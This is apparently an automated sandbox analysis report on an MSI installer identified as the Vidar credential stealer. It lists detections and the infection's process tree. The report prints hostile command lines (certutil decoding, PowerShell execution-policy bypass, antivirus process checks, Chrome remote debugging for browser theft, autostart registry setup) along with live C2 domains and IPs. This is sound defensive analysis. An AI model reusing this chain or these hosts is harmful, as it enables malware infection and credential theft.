Windows Analysis Report
Setup.msi

Overview

General Information

Sample name: Setup.msi
Analysis ID: 1576875
MD5: c1d7c466cf70f32ce2fd51609ea97fab
SHA1: d7fa0337f01755188d74e1ca17d9da89d36572da
SHA256: d10e2be559191ccef09f8b31c946fe09840f4c60374d44f6672663c53ba1431a
Tags: msiuser-smica83
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Common Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • msiexec.exe (PID: 7480 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Setup.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7572 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7620 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 50B4D686C01703530B412DCED2DB0D4F C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7816 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E4D759A8E406C9ACB7BC72DE0FA3790E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI64FB.tmp (PID: 7896 cmdline: "C:\Windows\Installer\MSI64FB.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" MD5: 250DA78FACCE68224B24D0FFAD65CA8E)
  • cmd.exe (PID: 7932 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • certutil.exe (PID: 7984 cmdline: certutil -decode -f C:\Users\user\AppData\Local\Temp\11808.ps1 C:\Users\user\AppData\Local\Temp\11808.ps1 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • cscript.exe (PID: 8000 cmdline: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • powershell.exe (PID: 8052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 1308 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • putt.exe (PID: 7284 cmdline: "C:\Users\user\AppData\Local\Temp\putt.exe" MD5: 27B18A5E8BDAA950AF93633A821C2BFA)
          • cmd.exe (PID: 1196 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7548 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 7688 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • tasklist.exe (PID: 7276 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 7260 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 1432 cmdline: cmd /c md 628056 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • findstr.exe (PID: 7784 cmdline: findstr /V "Cleared" Penalties MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 7804 cmdline: cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • Corrections.com (PID: 7808 cmdline: Corrections.com u MD5: 62D09F076E6E0240548C2F837536A46A)
              • chrome.exe (PID: 8156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
                • chrome.exe (PID: 4092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2408,i,649146787284632151,17109937592652742530,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • choice.exe (PID: 1516 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • svchost.exe (PID: 4928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
{"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Corrections.com PID: 7808 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
Process Memory Space: Corrections.com PID: 7808 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

            System Summary

            Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 7984, TargetFilename: C:\Users\user\AppData\Local\Temp\11808.ps1
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Corrections.com u, ParentImage: C:\Users\user\AppData\Local\Temp\628056\Corrections.com, ParentProcessId: 7808, ParentProcessName: Corrections.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8156, ProcessName: chrome.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 8000, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", ProcessId: 8052, ProcessName: powershell.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: msiexec /fou {C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} /qb, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7572, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2}\StubPath
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8052, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\putt.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\putt.exe, ParentProcessId: 7284, ParentProcessName: putt.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ProcessId: 1196, ProcessName: cmd.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", CommandLine|base64offset|contains: (, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KingSoft\1.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7932, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ProcessId: 8000, ProcessName: cscript.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cscript.exe //nologo "C:\Users\user\AppData\Local\Temp\runner.vbs", ParentImage: C:\Windows\System32\cscript.exe, ParentProcessId: 8000, ParentProcessName: cscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\11808.ps1", ProcessId: 8052, ProcessName: powershell.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4928, ProcessName: svchost.exe

            HIPS / PFW / Operating System Protection Evasion

            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1196, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7260, ProcessName: findstr.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-12-17T17:28:33.734481+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 138.124.60.133 | 80 | TCP
            2024-12-17T17:29:14.293539+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.4 | 49785 | TCP
            2024-12-17T17:29:16.597803+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 116.203.12.114 | 443 | 192.168.2.4 | 49791 | TCP
            2024-12-17T17:29:14.293340+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49785 | 116.203.12.114 | 443 | TCP

            AV Detection

            Source: https://sedone.online/emp | Avira URL Cloud: Label: malware
            Source: 26.2.Corrections.com.4040000.2.unpack | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199807592927", "Botnet": "d0wntg"}
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe | ReversingLabs: Detection: 36%
            Source: C:\Users\user\AppData\Local\Temp\putt.exe | ReversingLabs: Detection: 36%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 91.6% probability
            Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdb source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.msi, MSIAE63.tmp.0.dr, MSIAF01.tmp.0.dr, MSI614E.tmp.1.dr, 625ebf.msi.1.dr, MSIAF50.tmp.0.dr, MSIAFB0.tmp.0.dr, MSI60C0.tmp.1.dr
            Source: C:\Windows\System32\msiexec.exe | File opened: z:
            Source: C:\Windows\System32\msiexec.exe | File opened: x:
            Source: C:\Windows\System32\msiexec.exe | File opened: v:
            Source: C:\Windows\System32\msiexec.exe | File opened: t:
            Source: C:\Windows\System32\msiexec.exe | File opened: r:
            Source: C:\Windows\System32\msiexec.exe | File opened: p:
            Source: C:\Windows\System32\msiexec.exe | File opened: n:
            Source: C:\Windows\System32\msiexec.exe | File opened: l:
            Source: C:\Windows\System32\msiexec.exe | File opened: j:
            Source: C:\Windows\System32\msiexec.exe | File opened: h:
            Source: C:\Windows\System32\msiexec.exe | File opened: f:
            Source: C:\Windows\System32\msiexec.exe | File opened: b:
            Source: C:\Windows\System32\msiexec.exe | File opened: y:
            Source: C:\Windows\System32\msiexec.exe | File opened: w:
            Source: C:\Windows\System32\msiexec.exe | File opened: u:
            Source: C:\Windows\System32\msiexec.exe | File opened: s:
            Source: C:\Windows\System32\msiexec.exe | File opened: q:
            Source: C:\Windows\System32\msiexec.exe | File opened: o:
            Source: C:\Windows\System32\msiexec.exe | File opened: m:
            Source: C:\Windows\System32\msiexec.exe | File opened: k:
            Source: C:\Windows\System32\msiexec.exe | File opened: i:
            Source: C:\Windows\System32\msiexec.exe | File opened: g:
            Source: C:\Windows\System32\msiexec.exe | File opened: e:
            Source: C:\Windows\System32\svchost.exe | File opened: c:
            Source: C:\Windows\System32\msiexec.exe | File opened: a:
            Source: C:\Windows\Installer\MSI64FB.tmp | Code function: 4_2_00007FF749F93FC4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF749F93FC4
            Source: C:\Users\user\AppData\Local\Temp\putt.exe | Code function: 16_2_00406301 FindFirstFileW,FindClose,16_2_00406301
            Source: C:\Users\user\AppData\Local\Temp\putt.exe | Code function: 16_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FADC54
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FBA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA087
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FBA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,26_2_00FBA1E2
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FAE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,26_2_00FAE472
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FBA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,26_2_00FBA570
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FB66DC FindFirstFileW,FindNextFileW,FindClose,26_2_00FB66DC
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00F7C622 FindFirstFileExW,26_2_00F7C622
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FB73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_00FB73D4
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FB7333 FindFirstFileW,FindClose,26_2_00FB7333
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com | Code function: 26_2_00FAD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_00FAD921
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\628056\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\628056
            Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
            Source: chrome.exe | Memory has grown: Private usage: 8MB later: 41MB

            Networking

            Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49785 -> 116.203.12.114:443
            Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.12.114:443 -> 192.168.2.4:49785
            Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.12.114:443 -> 192.168.2.4:49791
            Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199807592927
            Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 16:28:33 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Mon, 16 Dec 2024 20:29:52 GMT ETag: "eecb3-629690af4c859" Accept-Ranges: bytes Content-Length: 978099 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program
            Source: global traffic | HTTP traffic detected: GET /detct0r HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
            Source: Joe Sandbox View | IP Address: 116.203.12.114
            Source: Joe Sandbox View | IP Address: 149.154.167.99
            Source: Joe Sandbox View | IP Address: 239.255.255.250
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network traffic | Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49738 -> 138.124.60.133:80
            Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknown | TCP traffic detected without corresponding DNS query: 138.124.60.133
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FBD889 InternetReadFile,SetEvent,GetLastError,SetEvent,26_2_00FBD889
            Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Connection: Keep-Alive Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
